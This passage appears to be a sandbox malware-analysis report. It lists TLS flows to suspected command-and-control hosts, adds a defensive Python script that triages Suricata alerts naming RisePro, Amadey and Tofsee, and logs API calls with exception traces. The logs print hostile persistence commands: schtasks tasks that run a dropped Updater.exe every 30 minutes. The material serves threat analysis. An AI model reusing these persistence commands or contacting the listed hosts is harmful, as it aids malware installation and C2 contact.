TLSv1 192.168.56.103:49644 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49663 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49649 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49652 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49651 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49656 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49659 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49657 -> 94.177.48.37:443 | C=US, O=Let's Encrypt, CN=R3 | CN=fleefight.it | 91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49660 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49662 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49667 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49668 -> 94.177.48.37:443 | C=US, O=Let's Encrypt, CN=R3 | CN=fleefight.it | 91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49674 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49676 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49684 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49681 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49691 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49673 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49692 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49671 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49677 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49669 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49675 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49670 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49678 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49672 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49685 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49679 -> 94.177.48.37:443 | C=US, O=Let's Encrypt, CN=R3 | CN=fleefight.it | 91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49683 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49686 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49688 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49680 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49689 -> 94.177.48.37:443 | C=US, O=Let's Encrypt, CN=R3 | CN=fleefight.it | 91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49687 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49690 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49693 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49694 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49695 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49696 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49697 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49225 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49250 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49261 -> 104.26.4.15:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49641 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49643 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49654 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49658 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49664 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49666 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49682 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49698 -> 154.92.15.189:443 | None | None | None
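The two Suricata sections above are most useful when read together: the SSLBL JA3 rule (SID 906200054) fires on the client side of the handshake, and in this run the very same "Tofsee" fingerprint hits accounts.google.com, *.gstatic.com, www.google.com and the Cloudflare front end, so on its own it identifies the TLS client stack the sample (or the sandbox) uses, not a Tofsee infection. Joining each alert to the certificate seen on the same client port sorts the JA3 noise from the flows that deserve attention. The script below is an added example, not part of the ZeroBOX output; ALERT_ROWS and TLS_ROWS are a constructed subset of the rows on this page (each TLS record collapsed to one line with " | " between flow, issuer, subject and fingerprint), and the BENIGN_CN_SUFFIXES list is a triage assumption for this run rather than anything the report states.

```python
"""Correlate the Suricata alert and TLS sections of a sandbox report.

Added example; not part of the ZeroBOX output. ALERT_ROWS and TLS_ROWS are a
constructed subset of the rows shown above. An alert is joined to the server
certificate of the same sandbox client port; SSLBL JA3 hits (SID 906200054)
are then attributed to the TLS client stack and reported only when the server
is not one of the hosts the same fingerprint also reached in this run.
"""
import re
from collections import Counter, defaultdict

SANDBOX_NET = "192.168.56."
JA3_SID = "906200054"
# Assumption for triage: hosts this run contacted with the same JA3 hash, where a hit
# says nothing about Tofsee.
BENIGN_CN_SUFFIXES = (".google.com", ".gstatic.com", "sni.cloudflaressl.com")
FAMILY_RE = re.compile(r"\b(RisePro|Amadey)\b")
ALERT_RE = re.compile(r"^TCP (\S+):(\d+) -> (\S+):(\d+) (\d+) (.*)$")

ALERT_ROWS = """\
TCP 193.233.132.62:50500 -> 192.168.56.103:49165 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49165 -> 193.233.132.62:50500 2049060 ET MALWARE Suspected RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 192.168.56.103:49185 -> 173.194.174.84:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49217 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49222 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49248 -> 94.177.48.37:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
"""

TLS_ROWS = """\
TLSv1 192.168.56.103:49168 -> 104.26.4.15:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49185 -> 173.194.174.84:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=accounts.google.com | e1:91:9a:16:6f:2f:49:fb:1c:f6:d7:db:dd:f0:e2:b0:9f:34:cc:e4
TLSv1 192.168.56.103:49217 -> 154.92.15.189:443 | C=US, O=Let's Encrypt, CN=R3 | CN=i.alie3ksgaa.com | e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.103:49222 -> 154.92.15.189:443 | None | None | None
TLSv1 192.168.56.103:49248 -> 94.177.48.37:443 | C=US, O=Let's Encrypt, CN=R3 | CN=fleefight.it | 91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
"""


def parse_alerts(text):
    """Yield alerts keyed on the sandbox client port, whichever direction Suricata logged."""
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if not m:
            continue
        sip, sport, dip, dport, sid, rest = m.groups()
        if sip.startswith(SANDBOX_NET):
            client_port, remote = int(sport), f"{dip}:{dport}"
        else:
            client_port, remote = int(dport), f"{sip}:{sport}"
        yield {"client_port": client_port, "remote": remote, "sid": sid, "sig": rest}


def parse_tls(text):
    """Map client port -> certificate fields; 'None' means no certificate was seen on the flow."""
    certs = {}
    for line in text.splitlines():
        if not line.startswith("TLSv"):
            continue
        flow, issuer, subject, fingerprint = [p.strip() for p in line.split("|")]
        port = int(re.search(r":(\d+) -> ", flow).group(1))
        certs[port] = {"issuer": issuer, "subject": subject, "fingerprint": fingerprint}
    return certs


def subject_cn(subject):
    m = re.search(r"CN=([^,]+)", subject or "")
    return m.group(1) if m else None


def triage(alert_text, tls_text):
    """Bucket alerts: ET MALWARE hits, and JA3 hits split by what the server certificate says."""
    certs = parse_tls(tls_text)
    out = defaultdict(list)
    for a in parse_alerts(alert_text):
        cert = certs.get(a["client_port"])
        cn = subject_cn(cert["subject"]) if cert else None
        if a["sid"] == JA3_SID:
            if cn and cn.endswith(BENIGN_CN_SUFFIXES):
                out["ja3_benign_host"].append((a["remote"], cn))
            elif cert is None or cert["subject"] == "None":
                out["ja3_no_cert"].append(a["remote"])  # worth a look: TLS with no cert logged
            else:
                out["ja3_suspect"].append((a["remote"], cn))
        elif "ET MALWARE" in a["sig"]:
            out["malware"].append((a["remote"], a["sid"], a["sig"]))
        else:
            out["other"].append((a["remote"], a["sid"], a["sig"]))
    return out


def families(findings):
    """Count the malware families named in the ET MALWARE signatures."""
    c = Counter()
    for _, _, sig in findings["malware"]:
        m = FAMILY_RE.search(sig)
        c[m.group(1) if m else "unknown"] += 1
    return dict(c)


if __name__ == "__main__":
    result = triage(ALERT_ROWS, TLS_ROWS)
    for bucket, items in sorted(result.items()):
        print(bucket, items)
    print(families(result))
```

Run against the full tables, what survives the filter is the RisePro C2 on 193.233.132.62:50500, the Amadey POSTs to 185.215.113.68, the Let's Encrypt hosts i.alie3ksgaa.com and fleefight.it, and the long run of certificate-less TLS flows to 154.92.15.189, which is where a second pass with the pcap should start.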

Time & API | Arguments | Status Return Repeated
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
Time & API | Arguments | Status Return Repeated
IsDebuggerPresent | | 0 0
IsDebuggerPresent | | 0 0
IsDebuggerPresent | | 0 0
IsDebuggerPresent | | 0 0
IsDebuggerPresent | | 0 0
IsDebuggerPresent | | 0 0
IsDebuggerPresent | | 0 0
Time & API | Arguments | Status Return Repeated
WriteConsoleW | buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: SUCCESS: The scheduled task "explorhe.exe" has successfully been created. console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: C:\Users\test22\AppData\Roaming\Temp> console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: chcp console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: C:\Users\test22\AppData\Roaming\Temp> console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: schtasks console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: Active code page: 1251 console_handle: 0x00000013 | 1 1 0
WriteConsoleW | buffer: SUCCESS: The scheduled task "MalayamaraUpdate" has successfully been created. console_handle: 0x00000007 | 1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx  1 1 0
Time & API Arguments Status Return Repeated

__exception__  stacktrace: face+0x299202 @ 0x1669202 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931576 edi=23453836 eax=0 ebp=3931604 edx=2 ebx=15807292 esi=5 ecx=15807292  |  1 0 0

__exception__  stacktrace: face+0x299202 @ 0x1669202 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931576 edi=3931576 eax=0 ebp=3931604 edx=2 ebx=22864410 esi=0 ecx=3931784  |  1 0 0
  (this identical record was logged 2 times in a row)

__exception__  stacktrace: face+0x299202 @ 0x1669202 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931576 edi=3931576 eax=0 ebp=3931604 edx=0 ebx=22864410 esi=0 ecx=3931784  |  1 0 0

__exception__  stacktrace: face+0x299202 @ 0x1669202 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931576 edi=3931576 eax=0 ebp=3931604 edx=0 ebx=22864367 esi=0 ecx=3931784  |  1 0 0

__exception__  stacktrace: face+0x299202 @ 0x1669202 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931576 edi=3931576 eax=0 ebp=3931604 edx=2 ebx=22864367 esi=0 ecx=3931784  |  1 0 0

__exception__  stacktrace: face+0x294ce4 @ 0x1664ce4 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=23453836 eax=0 ebp=3931556 edx=0 ebx=17924096 esi=22118400 ecx=22118400  |  1 0 0

__exception__  stacktrace: face+0x294ce4 @ 0x1664ce4 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=0 ebx=22864367 esi=0 ecx=3931564  |  1 0 0
  (this identical record was logged 2 times in a row)

__exception__  stacktrace: face+0x294ce4 @ 0x1664ce4 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=2 ebx=22864367 esi=0 ecx=3931564  |  1 0 0

__exception__  stacktrace: face+0x294ce4 @ 0x1664ce4 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=2 ebx=22864410 esi=0 ecx=3931564  |  1 0 0
  (this identical record was logged 2 times in a row)

__exception__  stacktrace: face+0x294ce4 @ 0x1664ce4 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=0 ebx=22864410 esi=0 ecx=3931564  |  1 0 0

__exception__  stacktrace: face+0x294dc0 @ 0x1664dc0 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=23453836 eax=0 ebp=3931556 edx=0 ebx=17924096 esi=22118400 ecx=1269045167  |  1 0 0

__exception__  stacktrace: face+0x294e92 @ 0x1664e92 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931528 edi=23453836 eax=0 ebp=3931556 edx=2 ebx=17924096 esi=22118400 ecx=3931556  |  1 0 0

__exception__  stacktrace: face+0x294e92 @ 0x1664e92 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=2 ebx=22864410 esi=0 ecx=3931564  |  1 0 0
  (this identical record was logged 2 times in a row)

__exception__  stacktrace: face+0x294f8c @ 0x1664f8c | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=23453836 eax=0 ebp=3931556 edx=0 ebx=17924096 esi=22118400 ecx=2969966937  |  1 0 0

__exception__  stacktrace: face+0x294f8c @ 0x1664f8c | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=0 ebx=22864367 esi=0 ecx=3931564  |  1 0 0
  (this identical record was logged 5 times in a row)

__exception__  stacktrace: face+0x295022 @ 0x1665022 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=23453836 eax=0 ebp=3931556 edx=0 ebx=17924096 esi=22118400 ecx=133792577  |  1 0 0

__exception__  stacktrace: face+0x295022 @ 0x1665022 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=2 ebx=22864367 esi=0 ecx=3931564  |  1 0 0

__exception__  stacktrace: face+0x295022 @ 0x1665022 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=0 ebx=22864410 esi=0 ecx=3931564  |  1 0 0

__exception__  stacktrace: face+0x295022 @ 0x1665022 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=0 ebx=22864367 esi=0 ecx=3931564  |  1 0 0

__exception__  stacktrace: face+0x295022 @ 0x1665022 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=2 ebx=22864367 esi=0 ecx=3931564  |  1 0 0

__exception__  stacktrace: face+0x295022 @ 0x1665022 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe1d9  module: face.exe  exception_code: 0xc0000094  offset: 2089433  address: 0x15ce1d9
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=0 ebx=22864410 esi=0 ecx=3931564  |  1 0 0

__exception__  stacktrace: face+0x295022 @ 0x1665022 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=2 ebx=22864367 esi=0 ecx=3931564  |  1 0 0

__exception__  stacktrace: face+0x295022 @ 0x1665022 | face+0x294107 @ 0x1664107 | face+0x2218dc @ 0x15f18dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: face+0x1fe204  module: face.exe  exception_code: 0xc000001d  offset: 2089476  address: 0x15ce204
  registers: esp=3931528 edi=3931528 eax=0 ebp=3931556 edx=2 ebx=22864410 esi=0 ecx=3931564  |  1 0 0

__exception__  stacktrace:
RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x7796f559
RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x7796f639
RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x7791df95
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x757f14dd
face+0xf374f @ 0x14c374f
face+0xea16e @ 0x14ba16e
face+0xdbe9c @ 0x14abe9c
face+0x10a142 @ 0x14da142
face+0xeeb23 @ 0x14beb23
face+0xeedd7 @ 0x14bedd7
face+0xeb99a @ 0x14bb99a
face+0xeb8c6 @ 0x14bb8c6
face+0xeba88 @ 0x14bba88
face+0xebbef @ 0x14bbbef
face+0xdc222 @ 0x14ac222
face+0x29a7c7 @ 0x166a7c7
0x3bfe88

  instruction: jmp 0x7796e667 (eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff)  symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653  module: ntdll.dll  exception_code: 0xc0000374  offset: 845395  address: 0x7796e653
  registers: esp=3930848 edi=8044640 eax=3930864 ebp=3930968 edx=0 ebx=0 esi=7864320 ecx=2147483647  |  1 0 0

__exception__  stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

  instruction: leave (c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b)  symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727  module: KERNELBASE.dll  exception_code: 0x80040155  offset: 46887  address: 0x7559b727
  registers: esp=103673428 edi=79945484 eax=103673428 ebp=103673508 edx=4164878962 ebx=103673792 esi=2147746133 ecx=79678152  |  1 0 0

__exception__  stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
